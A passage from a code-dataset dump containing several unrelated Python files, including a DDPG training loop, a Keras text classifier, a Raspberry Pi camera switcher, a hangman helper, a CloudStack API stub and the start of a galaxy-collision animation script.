False\n step = 0\n epsilon = 1\n noise = 50\n\n # Tensorflow GPU optimization\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n sess = tf.Session(config=config)\n\n from keras import backend as K\n K.set_session(sess)\n\n actor = ActorNetwork(sess, state_dim, action_dim, BATCH_SIZE, TAU, LRA)\n critic = CriticNetwork(sess, state_dim, action_dim, BATCH_SIZE, TAU, LRC)\n buff = ReplayBuffer(BUFFER_SIZE) # Create replay buffer\n\n def getAction(s_t, train_indicator):\n global epsilon\n epsilon -= 1.0 / EXPLORE\n a_t = np.zeros([1, action_dim])\n noise_t = np.zeros([1, action_dim])\n\n a_t_original = actor.model.predict(s_t)\n print('Original Shift: ', a_t_original)\n\n # noise_t[0][0] = train_indicator * max(epsilon, 0) * OU.function(a_t_original[0][0], 600, 0.5, 75)\n # noise_t[0][1] = train_indicator * max(epsilon, 0) * OU.function(a_t_original[0][1], 300, 0.5, 75)\n\n noise_t[0][0] = train_indicator * max(epsilon, 0) * np.random.randn(1)[0] * noise\n noise_t[0][1] = train_indicator * max(epsilon, 0) * np.random.randn(1)[0] * noise\n\n # in case the noise is too big\n if abs(noise_t[0][0]) > 2 * noise:\n noise_t[0][0] = 0\n if abs(noise_t[0][1]) > 2 * noise:\n noise_t[0][1] = 0\n\n print('Noise: ', noise_t[0])\n\n a_t[0][0] = a_t_original[0][0] + noise_t[0][0]\n a_t[0][1] = a_t_original[0][1] + noise_t[0][1]\n\n \"\"\"\n Send the target point and wait for the agent to execute the action\n \"\"\"\n target_point_x = int(a_t[0][0])\n target_point_y = int(a_t[0][1])\n target_point_str = str(target_point_x) + ',' + str(target_point_y)\n print('Action: ', target_point_str)\n return target_point_str\n\n # Now load the weight\n if resume:\n actor.model.load_weights(\"actormodel.h5\")\n critic.model.load_weights(\"criticmodel.h5\")\n actor.target_model.load_weights(\"actormodel.h5\")\n critic.target_model.load_weights(\"criticmodel.h5\")\n print(\"Weight load successfully\")\n\n if runGame:\n for i in range(training_steps):\n \"\"\"\n Receive `prevState`, the extracted feature before shoot\n \"\"\"\n # Receive state from different pipes here\n\n for agent_id in range(client_number):\n data = ABPipe.read_shoot(pipe_id=agent_id)\n s_t = np.array(data.split(',')[0:-1], dtype=float).reshape(1, 2000)\n\n target_point_str = getAction(s_t, train_indicator)\n\n # abPipe.writeShoot(target_point_str)\n ABPipe.write_shoot(string=target_point_str, pipe_id=agent_id)\n\n # this is for one pipe. repeat for eight times\n\n \"\"\"\n Receive bufferGroup after one episode\n \"\"\"\n for agent_id in range(client_number):\n buffer_group_str = ABPipe.read_buffers(pipe_id=agent_id)\n buff.append_from_buffer_group_string(buffer_group_str)\n\n # after receiving bufferGroup, no matter there is buffer, we start training once\n\n print('Buffer size is: ', buff.count())\n \"\"\"\n buff.add(s_t, a_t, r_t, s_t1, done)\n Add replay buffer\n Format: buff.add((np.ones(500), (300,300), 10000, np.ones(500), False))\n Do the batch update\n \"\"\"\n if train_indicator and buff.count() != 0:\n batch = buff.getBatch(BATCH_SIZE)\n states = np.asarray([e[0] for e in batch])\n actions = np.asarray([e[1] for e in batch])\n rewards = np.asarray([e[2] for e in batch])\n new_states = np.asarray([e[3] for e in batch])\n dones = np.asarray([e[4] for e in batch])\n y_t = np.asarray([e[1] for e in batch])\n\n target_q_values = critic.target_model.predict([new_states, actor.target_model.predict(new_states)])\n\n for k in range(len(batch)):\n if dones[k]:\n y_t[k] = rewards[k]\n else:\n y_t[k] = rewards[k] + GAMMA * target_q_values[k]\n\n # print('Batch: ', batch)\n loss = critic.model.train_on_batch([states, actions], y_t)\n a_for_grad = actor.model.predict(states)\n grads = critic.gradients(states, a_for_grad)\n actor.train(states, grads)\n actor.target_train()\n critic.target_train()\n\n if np.mod(i, 10) == 0:\n print(\"Now we save model\")\n actor.model.save_weights(\"actormodel.h5\", overwrite=True)\n with open(\"actormodel.json\", \"w\") as outfile:\n json.dump(actor.model.to_json(), outfile)\n\n critic.model.save_weights(\"criticmodel.h5\", overwrite=True)\n with open(\"criticmodel.json\", \"w\") as outfile:\n json.dump(critic.model.to_json(), outfile)\n\n np.save('buffer.npy', buff.buffer)\n\n\nif __name__ == \"__main__\":\n playGame(train_indicator=1, runGame=1, resume=False, client_number=4)\n","sub_path":"OldBird.py","file_name":"OldBird.py","file_ext":"py","file_size_in_byte":6242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"538600067","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Feb 13 16:18:17 2018\r\n\r\n@author: Jeremy\r\n\"\"\"\r\n\r\nimport main_diffusion_rk as main\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\nstore_dt = np.zeros((4,5))\r\nfor i in range(1,5):\r\n for k in range(1,6):\r\n dt = 0.025\r\n delta_t = 0.05\r\n error_L2 = 0\r\n while (error_L2 < 200):\r\n ###############################################################################\r\n # INPUTS #\r\n ###############################################################################\r\n scheme = k #version 1 sun, version 2 IP, version 3 LDG, version 4 BR2, version 5 Gassner\r\n D = 1 #diffusion coefficient\r\n delta_t = delta_t + dt #time step parameter\r\n n_cells = 49 #number of cells in the mesh\r\n x_min = 0 #left coordinate of the physical domain\r\n x_max = 50 #right coordinate of the physical domain\r\n order_of_accuracy = i #order of accuracy of the solution\r\n # (number of solution points = order_of_accuracy)\r\n n_time_step = 30 #number of steps calculated\r\n dirichlet = 0; #dirichlet = 0, no dirichlet condition, 1 dirichlet condition (1 at right border)\r\n \r\n initial_choice = 0 #initialization 0 gaussian, 1 dirichlet, 2 stationary\r\n time_ech = 10 #periode where we compare the solution to the analytique solution\r\n x_coordinates, simulated_time, initial_solution, results, theoretical_values,error_L2 = \\\r\n main.run_main(scheme, D, delta_t, n_cells, x_min, \\\r\n x_max, order_of_accuracy, n_time_step,initial_choice,dirichlet,time_ech)\r\n \r\n if (scheme == 1):\r\n schema = 'Sun'\r\n if (scheme == 2):\r\n schema = 'IP'\r\n if (scheme == 3):\r\n schema = 'LDG'\r\n if (scheme == 4):\r\n schema = 'BR2'\r\n if (scheme == 5):\r\n schema = 'Gassner'\r\n \r\n '''\r\n ###############################################################################\r\n # PLOT THE SOLUTION AT A GIVEN TIME STEP #\r\n ###############################################################################\r\n plt.plot(x_coordinates, initial_solution)\r\n plt.plot(x_coordinates, results)\r\n if (initial_choice == 0 ):\r\n plt.plot(x_coordinates, theoretical_values)\r\n plt.legend(['t = 0', \\\r\n 't =' + str(round(simulated_time, 1)), \\\r\n 'therorical solution at ' + str(round(simulated_time, 1))])\r\n plt.title(schema+', time step = '+str(delta_t)+', degree ='+str(order_of_accuracy)+', error L2 = '+str(error_L2))\r\n else :\r\n plt.legend(['t = 0', \\\r\n 't =' + str(round(simulated_time, 1))])\r\n plt.title(schema+', time step = '+str(delta_t)+', degree ='+str(order_of_accuracy))\r\n ''' \r\n print(error_L2)\r\n \r\n store_dt[i-4,k-1] = delta_t \r\n\r\n","sub_path":"Diffusion/Code complet/sd_launcher_convergence.py","file_name":"sd_launcher_convergence.py","file_ext":"py","file_size_in_byte":3591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"18329229","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/jennyq/.pyenv/versions/venv_t12/lib/python3.7/site-packages/tendenci/apps/memberships/migrations/0006_membershipset_donation_amount.py\n# Compiled at: 2020-03-30 17:48:04\n# Size of source mod 2**32: 425 bytes\nfrom django.db import migrations, models\n\nclass Migration(migrations.Migration):\n dependencies = [\n ('memberships', '0005_auto_20161101_1518')]\n operations = [\n migrations.AddField(model_name='membershipset',\n name='donation_amount',\n field=models.DecimalField(default=0, max_digits=15, decimal_places=2, blank=True))]","sub_path":"pycfiles/tendenci-12.0.3-py3-none-any/0006_membershipset_donation_amount.cpython-37.py","file_name":"0006_membershipset_donation_amount.cpython-37.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"441297662","text":"# -*- coding: utf-8 -*-\n# datos o funciones auxiliares para mantener ordenado nuestro codigo del jugador\n\nimport time\n\n\ndef enviarPalabraParaContrincante(longitud):\n \"\"\"\n Función que, dada la longitud de una palabra, devuelve la palabra pedida al\n usuario que recibe el mensaje.\n\n Parameters\n ----------\n longitud : int\n Longitud de la palabra.\n\n Returns\n -------\n palabra: str\n Palabra escrita por el usuario.\n \"\"\"\n\n time.sleep(1)\n\n while True:\n\n palabra = input('Propón una palabra para tu contrincante de la longitud indicada: ')\n palabra.lower()\n if len(palabra) != longitud:\n print('Por favor, que sea de la longitud indicada.')\n elif not all([char in \"abcdefghijklmnñopqrstuvwxyz\" for char in palabra]):\n print('Por favor, ingresa una PALABRA.')\n else:\n return palabra\n\n\ndef obtenerIntento(letrasProbadas):\n \"\"\"\n Función que, dada una lista de las letras probadas ya, devuelve un intento para \n introducir una letra nueva pedida al usuario.\n\n Parameters\n ----------\n letrasProbadas : list\n Lista de letras ya recibidas por el usuario.\n\n Returns\n -------\n intento : str\n Letra introducida por el usuario.\n \n \"\"\"\n\n while True:\n\n time.sleep(1) \n intento = input('Adivina una de las letras: ')\n intento = intento.lower()\n if len(intento) != 1:\n print('Por favor, introduce UNA letra.')\n elif intento in letrasProbadas:\n print('Ya has probado esa letra. Elige otra.')\n elif intento not in 'abcdefghijklmnñopqrstuvwxyz':\n print('Por favor ingresa una LETRA.')\n else:\n return intento\n","sub_path":"auxiliaresJugador.py","file_name":"auxiliaresJugador.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"227657014","text":"str = input()\npList = []\nkList = []\nhList = []\ntList = []\n\ni = len(str)-1\nwhile i >= 0:\n\tnumber = (int(str[i-1])*10)+(int(str[i]*1))\n\ti = i-3\n\tif str[i+1] == \"P\":\n\t\tpList.append(number)\n\telif str[i+1] == \"K\":\n\t\tkList.append(number)\n\telif str[i+1] == \"H\":\n\t\thList.append(number)\n\telif str[i+1] == \"T\":\n\t\ttList.append(number)\n\n#print(pList); print(kList); print(hList); print(tList)\ndef ele_uniqueness(lis):\n\tcheck = True\n\tif len(lis) < 2:\n\t\treturn check\n\telse:\n\t\tfor j in range(len(lis)):\n\t\t\tfor k in range(j+1, len(lis)):\n\t\t\t\tif(lis[j] == lis[k]):\n\t\t\t\t\tcheck = False\n\treturn check\n\nif ele_uniqueness(pList) and ele_uniqueness(kList) and ele_uniqueness(hList) and ele_uniqueness(tList):\n\tprint(13-len(pList), 13-len(kList), 13-len(hList), 13-len(tList))\n\nelse:\n\tprint(\"GRESKA\")\n\t","sub_path":"karte.py","file_name":"karte.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"163793164","text":"#Programmer: Israel Garcia Figueroa\n#program: operates the camera on with arducam module\n#Team: ROV team\n#---------------------------------------------------\nimport pygame\nimport sys\nimport time \nimport pygame.camera\n\nimport RPi.GPIO as gp\nimport os\n#import xbox\nimport time\nfrom picamera import PiCamera #\n\nimport threading\nclass myThread (threading.Thread):\n def __init__(self, threadID, name, counter):\n threading.Thread.__init__(self)\n self.threadID = threadID\n self.name = name\n self.counter = counter\n def run(self):\n camA = Capture()\n \n camA.main()\n print(\"stopping camera thread\")\n\nclass Capture(object):\n def __init__(self):\n self.size = (1280,720)\n # create a display surface. standard pygame stuff\n self.display = pygame.display.set_mode(self.size, 0)\n\n # this is the same as what we saw before\n self.clist = pygame.camera.list_cameras()\n if not self.clist:\n raise ValueError(\"Sorry, no cameras detected.\")\n self.cam = pygame.camera.Camera(self.clist[0], self.size)\n self.cam.start()\n\n # create a surface to capture to. for performance purposes\n # bit depth is the same as that of the display surface.\n self.snapshot = pygame.surface.Surface(self.size, 0, self.display)\n\n def get_and_flip(self):\n # if you don't want to tie the framerate to the camera, you can check\n # if the camera has an image ready. note that while this works\n # on most cameras, some will never return true.\n if self.cam.query_image():\n self.snapshot = self.cam.get_image(self.snapshot)\n\n # blit it to the display surface. simple!\n self.display.blit(self.snapshot, (0,0))\n pygame.display.flip()\n\n def main(self):\n #pygame.joystick.init()\n going = True\n print(\"starting live feed\")\n time.sleep(2)\n while going:\n #event = pygame.event.get()\n\n for event in pygame.event.get(): # User did something.\n #print(\"in for loop\")\n if (event.type == pygame.QUIT or event.type == pygame.JOYBUTTONDOWN or\n event.type == pygame.KEYDOWN or event.type == pygame.KEYUP):# If user clicked close.\n print(\"closing camera\")\n going = False # Flag that we are done so we exit this loop.\n self.cam.stop()\n if(going):\n self.get_and_flip()\n \n \nos.environ[\"DISPLAY\"]= \":0\" \n# gpio being set up for i2c interface\ngp.setwarnings(False)\ngp.setmode(gp.BOARD)\n\ngp.setup(7, gp.OUT)\ngp.setup(11, gp.OUT)\ngp.setup(12, gp.OUT)\n\ngp.setup(15, gp.OUT)\ngp.setup(16, gp.OUT)\ngp.setup(21, gp.OUT)\ngp.setup(22, gp.OUT)\n\ngp.output(11, True)\ngp.output(12, True)\ngp.output(15, True)\ngp.output(16, True)\ngp.output(21, True)\ngp.output(22, True)\n#end of i2c setup for camera\n\npygame.init()\nWINDOW_HEIGHT = 700\nWINDOW_WIDTH = 500\nscreen = pygame.display.set_mode((WINDOW_WIDTH, WINDOW_HEIGHT))\n\npygame.joystick.init()\npygame.camera.init()\n#joy = xbox.Joystick() # joy object for our xbox 360 camera\n\n\ncamera = 1# O will be cam a and 1 will be cam b\npermit = False #semiphore to prevent setupt on the\ndone = False\n\n#print(threading.enumerate())\nwhile(not done):\n\n for event in pygame.event.get(): # User did something.\n if event.type == pygame.QUIT: # If user clicked close.\n print(\"closing\")\n done = True # Flag that we are done so we exit this loop. \n joystick_count = pygame.joystick.get_count()\n for i in range(joystick_count):\n joystick = pygame.joystick.Joystick(i)\n joystick.init()\n\n try:\n jid = joystick.get_instance_id()\n except AttributeError:\n # get_instance_id() is an SDL2 method\n jid = joystick.get_id()\n\n # Get the name from the OS for the controller/joystick.\n name = joystick.get_name()\n #print(name)\n \n\n try:\n guid = joystick.get_guid()\n except AttributeError:\n # get_guid() is an SDL2 method\n pass\n else:\n print(guid)\n buttons = joystick.get_numbuttons()\n for i in range(buttons):\n button = joystick.get_button(i)\n if(button == True and i == 6):\n done = True\n if(button == True and i == 3): # button press: 0 -> false, 1 -> true\n print(\"camera button was pressed\")\n time.sleep(.4) #rebounding on button press\n if camera == 0:\n camera = 1\n permit = True\n #cmd = \"raspistill -t 1\"\n #os.system(cmd)\n\n elif camera ==1:\n camera =0\n permit =True\n #print(\"looping main\")\n\n for event in pygame.event.get():\n if event.type == pygame.KEYDOWN or event.type == pygame.KEYUP:\n if event.key == pygame.K_DOWN:\n print('No modifier keys were in a pressed state when this '\n 'event occurred.')\n print(\"camera button was pressed\")\n time.sleep(.4) #rebounding on button press\n if camera == 0:\n camera = 1\n permit = True\n #cmd = \"raspistill -t 1\"\n #os.system(cmd)\n\n elif camera ==1:\n camera =0\n permit =True\n #print(\"looping main\")\n\n\n\n\n\n\n\n\n\n if permit == True: # condition will check if to change camera\n print(\"changing camera to \")\n if camera == 0 :\n permit = False\n i2c = \"i2cset -y 1 0x70 0x00 0x04 \"\n os.system(i2c)\n gp.output(7, False)\n gp.output(11, False)\n gp.output(12, True)\n print(\"Camera A\")\n\n \n #print(\"starting camera thread.... \")\n #if(threadB.isAlive()):\n # print(\"but camera A on.... \")\n # threadB.join(1)\n # print(\"camera A off \")\n \n #print(threading.enumerate())\n\n threadA = myThread(1,\"Camera A\", 1)\n threadA.start()\n #print(threading.enumerate())\n #cmd = \"raspistill -p 10,10,852,480 -t 1800000 -k &\" # will time after 30 min\n #os.system(cmd)\n\n elif camera == 1:\n permit = False\n i2c = \"i2cset -y 1 0x70 0x00 0x06\"\n os.system(i2c)\n gp.output(7, False)\n gp.output(11, True)\n gp.output(12, False)\n print(\"camera B\")\n \n #print(\"starting camera thread... \")\n #if(threadA.isAlive()):\n # print(\"but wainting for camera A thread to rejoind... \")\n # threadA.join(1)\n # print(\"camera a closed\")\n #if(threading.activeCount() >1):\n # print(\"waiting to close\")\n # time.sleep(2)\n threadB = myThread(2,\"Camera b\", 1)\n threadB.start()\n \n #cmd = \"raspistill -p 10,10,852,480 -t 1800000 -k &\"S\n #os.system(cmd)\n# to end current camera process, press key k then key enter\n# then press the y button to swap camera\n# NOTE: the keystorks must be within the terminal or else the operation will not work.\n","sub_path":"orginalCamera.py","file_name":"orginalCamera.py","file_ext":"py","file_size_in_byte":7386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"404669918","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import print_function\nfrom gensim.models import Word2Vec\nfrom keras.preprocessing.text import Tokenizer\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.utils.np_utils import to_categorical\nfrom keras.layers import Dense, Flatten, Dropout, Activation, Input, LSTM, Bidirectional\nfrom keras.models import Sequential\nfrom keras.engine import Model\nfrom keras.layers import Conv1D, MaxPooling1D, Embedding, concatenate\nfrom keras.constraints import max_norm\nfrom keras.regularizers import l2\n\nimport os\nimport numpy as np\nimport codecs\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n\n\nS_CNN = True\nM_CNN = False\n\nU_LSTM = False\nB_LSTM = False\n\nCNN_LSTM = False\n\nnp.random.seed(1337)\nMAX_SEQUENCE_LENGTH = 25\nMAX_NB_WORDS = 20000\nEMBEDDING_DIM = 300\nDATA_DIR = 'data/word'\n\ntrain_texts = []\ntrain_labels = []\nvalid_texts = []\nvalid_labels = []\n\nmodel_names = []\nbest_accuracy = []\n\nlabels_index = {'history': 0,\n 'military': 1,\n 'baby': 2,\n 'world': 3,\n 'tech': 4,\n 'game': 5,\n 'society': 6,\n 'sports': 7,\n 'travel': 8,\n 'car': 9,\n 'food': 10,\n 'entertainment': 11,\n 'finance': 12,\n 'fashion': 13,\n 'discovery': 14,\n 'story': 15,\n 'regimen': 16,\n 'essay': 17}\n\n\ndef single_cnn():\n\n model = Sequential()\n\n model.add(Embedding(nb_words + 1,\n EMBEDDING_DIM,\n weights=[embedding_matrix],\n input_length=MAX_SEQUENCE_LENGTH,\n trainable=True))\n\n model.add(Conv1D(filters=250,\n kernel_size=3,\n padding='valid',\n activation='relu',\n strides=1))\n\n model.add(MaxPooling1D(pool_size=model.output_shape[1]))\n\n model.add(Flatten())\n\n model.add(Dense(128))\n model.add(Dropout(0.2))\n model.add(Activation('relu'))\n\n model.add(Dense(len(labels_index), activation='softmax'))\n\n return model\n\n\ndef multi_cnn():\n nb_filter = 250\n filter_lengths = [2, 3, 5, 7]\n sequence_input = Input(shape=(MAX_SEQUENCE_LENGTH,), dtype='int32')\n embedding_layer = Embedding(nb_words + 1,\n EMBEDDING_DIM,\n weights=[embedding_matrix],\n input_length=MAX_SEQUENCE_LENGTH,\n trainable=True)\n embedded_sequences = embedding_layer(sequence_input)\n\n cnn_layers = []\n\n for filter_length in filter_lengths:\n x = Conv1D(filters=nb_filter,\n kernel_size=filter_length,\n padding='valid',\n activation='relu',\n kernel_constraint=max_norm(3),\n kernel_regularizer=l2(0.0001),\n strides=1)(embedded_sequences)\n x = MaxPooling1D(pool_size=MAX_SEQUENCE_LENGTH - filter_length + 1)(x)\n x = Flatten()(x)\n cnn_layers.append(x)\n\n x = concatenate(cnn_layers)\n x = Dropout(0.2)(x)\n x = Dense(128, activation='relu')(x)\n y_hat = Dense(len(labels_index), activation='softmax')(x)\n\n model = Model(sequence_input, y_hat)\n\n return model\n\n\ndef unidirection_lstm():\n\n model = Sequential()\n\n model.add(Embedding(nb_words + 1,\n EMBEDDING_DIM,\n weights=[embedding_matrix],\n input_length=MAX_SEQUENCE_LENGTH,\n trainable=True))\n model.add(LSTM(128, dropout=0.2, recurrent_dropout=0.2))\n model.add(Dense(len(labels_index), activation='softmax'))\n\n return model\n\n\ndef bidirection_lstm():\n\n model = Sequential()\n\n model.add(Embedding(nb_words + 1,\n EMBEDDING_DIM,\n weights=[embedding_matrix],\n input_length=MAX_SEQUENCE_LENGTH,\n trainable=True))\n model.add(Bidirectional(LSTM(128)))\n model.add(Dropout(0.5))\n model.add(Dense(len(labels_index), activation='softmax'))\n\n return model\n\n\ndef cnn_lstm():\n model = Sequential()\n\n model.add(Embedding(nb_words + 1,\n EMBEDDING_DIM,\n weights=[embedding_matrix],\n input_length=MAX_SEQUENCE_LENGTH,\n trainable=True))\n model.add(Dropout(0.25))\n model.add(Conv1D(filters=1000,\n kernel_size=3,\n padding='valid',\n activation='relu',\n strides=1))\n model.add(MaxPooling1D(pool_size=model.output_shape[1]))\n model.add(LSTM(128))\n model.add(Dense(len(labels_index), activation='softmax'))\n\n return model\n\n\nif __name__ == '__main__':\n\n print('Indexing word vectors.')\n\n pre_trained_embeddings = Word2Vec.load('nlpcc_task2_300_dim.bin')\n\n weights = pre_trained_embeddings.wv.syn0\n embeddings_index = dict([(k, v.index) for k, v in pre_trained_embeddings.wv.vocab.items()])\n\n print('Found %s word vectors.' % len(embeddings_index))\n\n print('Processing text dataset')\n\n with codecs.open(os.path.join(DATA_DIR, 'train.txt'), 'rb') as f:\n for line in f.readlines():\n train_texts.append(line.strip().split('\\t')[1])\n train_labels.append(labels_index[line.strip().split('\\t')[0]])\n\n with codecs.open(os.path.join(DATA_DIR, 'dev.txt'), 'rb') as f:\n for line in f.readlines():\n valid_texts.append(line.strip().split('\\t')[1])\n valid_labels.append(labels_index[line.strip().split('\\t')[0]])\n\n print('Found %s train texts.' % len(train_texts))\n print('Found %s valid texts.' % len(valid_texts))\n\n tokenizer = Tokenizer(num_words=MAX_NB_WORDS)\n tokenizer.fit_on_texts(train_texts)\n train_sequences = tokenizer.texts_to_sequences(train_texts)\n valid_sequences = tokenizer.texts_to_sequences(valid_texts)\n\n word_index = tokenizer.word_index\n print('Found %s unique tokens.' % len(word_index))\n\n x_train = pad_sequences(train_sequences, maxlen=MAX_SEQUENCE_LENGTH)\n x_valid = pad_sequences(valid_sequences, maxlen=MAX_SEQUENCE_LENGTH)\n\n y_train = to_categorical(np.asarray(train_labels))\n y_valid = to_categorical(np.asarray(valid_labels))\n print('Shape of train data tensor:', x_train.shape)\n print('Shape of train label tensor:', y_train.shape)\n print('Shape of valid data tensor:', x_valid.shape)\n print('Shape of valid label tensor:', y_valid.shape)\n\n print('Preparing embedding matrix.')\n\n nb_words = min(MAX_NB_WORDS, len(word_index))\n embedding_matrix = np.zeros((nb_words + 1, EMBEDDING_DIM))\n\n for word, i in word_index.items():\n if i > MAX_NB_WORDS:\n continue\n embedding_vector = embeddings_index.get(word.decode('utf-8'))\n if embedding_vector is not None:\n # words not found in embedding index will be all-zeros.\n embedding_matrix[i] = weights[embeddings_index[word.decode('utf-8')], :]\n if S_CNN:\n\n s_cnn = single_cnn()\n s_cnn.compile(loss='categorical_crossentropy',\n optimizer='adam',\n metrics=['accuracy'])\n\n s_cnn_hist = s_cnn.fit(x_train, y_train, validation_data=(x_valid, y_valid),\n epochs=5, batch_size=128)\n best_accuracy.append(np.max(s_cnn_hist.history['val_acc']))\n model_names.append('S_CNN')\n # save results\n s_cnn_result_array = s_cnn.predict_classes(x_valid, batch_size=128)\n np.save('data/s_cnn_result.npy', s_cnn_result_array)\n print('s_cnn result shape:', s_cnn_result_array.shape)\n\n if M_CNN:\n m_cnn = multi_cnn()\n m_cnn.compile(loss='categorical_crossentropy',\n optimizer='adam',\n metrics=['accuracy'])\n\n m_cnn_hist = m_cnn.fit(x_train, y_train, validation_data=(x_valid, y_valid),\n epochs=5, batch_size=128)\n best_accuracy.append(np.max(m_cnn_hist.history['val_acc']))\n model_names.append('M_CNN')\n # save results\n m_cnn_result_array = m_cnn.predict(x_valid, batch_size=128)\n m_cnn_result_classes = [np.argmax(class_list) for class_list in m_cnn_result_array]\n m_cnn_result_classes_array = np.asarray(m_cnn_result_classes, dtype=np.int8)\n np.save('data/m_cnn_result.npy', m_cnn_result_classes_array)\n print('m_cnn result shape:', m_cnn_result_classes_array.shape)\n\n if U_LSTM:\n u_lstm = unidirection_lstm()\n u_lstm.compile(loss='categorical_crossentropy',\n optimizer='adam',\n metrics=['accuracy'])\n\n u_lstm_hist = u_lstm.fit(x_train, y_train, validation_data=(x_valid, y_valid),\n epochs=5, batch_size=128)\n best_accuracy.append(np.max(u_lstm_hist.history['val_acc']))\n model_names.append('U_LSTM')\n # save results\n u_lstm_result_array = u_lstm.predict_classes(x_valid, batch_size=128)\n np.save('data/u_lstm_result.npy', u_lstm_result_array)\n print('u_lstm result shape:', u_lstm_result_array.shape)\n\n if B_LSTM:\n b_lstm = bidirection_lstm()\n b_lstm.compile(loss='categorical_crossentropy',\n optimizer='adam',\n metrics=['accuracy'])\n\n b_lstm_hist = b_lstm.fit(x_train, y_train, validation_data=(x_valid, y_valid),\n epochs=5, batch_size=128)\n best_accuracy.append(np.max(b_lstm_hist.history['val_acc']))\n model_names.append('B_LSTM')\n # save results\n b_lstm_result_array = b_lstm.predict_classes(x_valid, batch_size=128)\n np.save('data/b_lstm_result.npy', b_lstm_result_array)\n print('b_lstm result shape:', b_lstm_result_array.shape)\n\n if CNN_LSTM:\n conv_lstm = cnn_lstm()\n conv_lstm.compile(loss='categorical_crossentropy',\n optimizer='adam',\n metrics=['accuracy'])\n\n conv_lstm_hist = conv_lstm.fit(x_train, y_train, validation_data=(x_valid, y_valid),\n epochs=5, batch_size=128)\n best_accuracy.append(np.max(conv_lstm_hist.history['val_acc']))\n model_names.append('CNN_LSTM')\n # save results\n conv_lstm_result_array = conv_lstm.predict_classes(x_valid, batch_size=128)\n np.save('data/conv_lstm_result.npy', conv_lstm_result_array)\n print('conv_lstm result shape:', conv_lstm_result_array.shape)\n\n # # Plot model accuracy\n # for idx, hist in enumerate(hists):\n # plt.plot(hist.history['acc'], color='blue', label=model_names[idx]+' train')\n # plt.plot(hist.history['val_acc'], color='red', label=model_names[idx] + ' valid')\n # plt.title('Model Accuracy')\n # plt.ylabel('accuracy')\n # plt.xlabel('epoch')\n # plt.legend(loc='upper left')\n # plt.savefig('accuracy.png')\n #\n # # Plot model loss\n # for idx, hist in enumerate(hists):\n # plt.plot(hist.history['loss'], color='blue', label=model_names[idx] + ' train')\n # plt.plot(hist.history['val_loss'], color='red', label=model_names[idx] + ' valid')\n # plt.title('Model Loss')\n # plt.ylabel('loss')\n # plt.xlabel('epoch')\n # plt.legend(loc='lower left')\n # plt.savefig('loss.png')\n\n print('Results Summary')\n assert len(model_names) == len(best_accuracy)\n for i in range(len(model_names)):\n print('*' * 20)\n print('Model Name:', model_names[i])\n print('Best Accuracy:', best_accuracy[i])\n print('*' * 20)\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":11805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"142694845","text":"\"\"\"Deletes a vmsnapshot.\"\"\"\nfrom baseCmd import *\nfrom baseResponse import *\n\n\nclass deleteVMSnapshotCmd (baseCmd):\n typeInfo = {}\n\n def __init__(self):\n self.isAsync = \"true\"\n \"\"\"The ID of the VM snapshot\"\"\"\n \"\"\"Required\"\"\"\n self.vmsnapshotid = None\n self.typeInfo['vmsnapshotid'] = 'uuid'\n self.required = [\"vmsnapshotid\", ]\n\n\nclass deleteVMSnapshotResponse (baseResponse):\n typeInfo = {}\n\n def __init__(self):\n \"\"\"any text associated with the success or failure\"\"\"\n self.displaytext = None\n self.typeInfo['displaytext'] = 'string'\n \"\"\"true if operation is executed successfully\"\"\"\n self.success = None\n self.typeInfo['success'] = 'boolean'\n\n","sub_path":"marvin/cloudstackAPI/deleteVMSnapshot.py","file_name":"deleteVMSnapshot.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"398895589","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 25 10:28:49 2020\n@author: Cindy, Bjorn, Sean\n- Need to figure out why rhs_2_body takes so long to run every time\n- Need to adapt the right hand side function in main to work with the integrator function\n- Need to create option to load solution from data file and animate rather than running\n- Need to create a function to determine percentage of ejected material using energy\n\"\"\"\n\nimport main1 as main # rename as needed\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as ani\nimport matplotlib as mpl\nfrom astropy.table import Table, Column\n\n\nplt.close('all')\n\n'''\nAnimation parameters:\n x_spacing ; additional space to leave on plots in x-direction\n y_spacing ; additional space to leave on plots in y-direction\n animation_speed_scaling ; increase for faster animation\n save_animation\n animation_writer ; recommended either imagemagick or ffmpeg\n animation_dir ; save animations to this directory\n animation_file_name ; option to create custom file name:\n - .gif for imagemagick, .mp4 for ffmpeg\n - leave blank to automatically create file name\n - do not start with '_ani' unless you want to confuse my dumb program\n histograms ; set true to display histograms\n'''\n\nx_spacing = 0.1\ny_spacing = 0.1\nanimation_speed_scaling = 1\n#save_animation = False\nanimation_writer = 'imagemagick'\nanimation_dir = 'animations' # make this folder if it doesn't exist already\nanimation_file_name = ''\n#histograms = True\n\n# I am having the animate function call main so all work done toying with\n# parameters and initial conditions can be done just in this file\n\n'''\n# rotated galaxy; euler angles in radians; easy test case\nsolution, num_galaxies = main.main(num_galaxies=1, galaxy_pos=np.array([[-10,-2,0]]),\n galaxy_vel=np.array([[0,0,0]]), 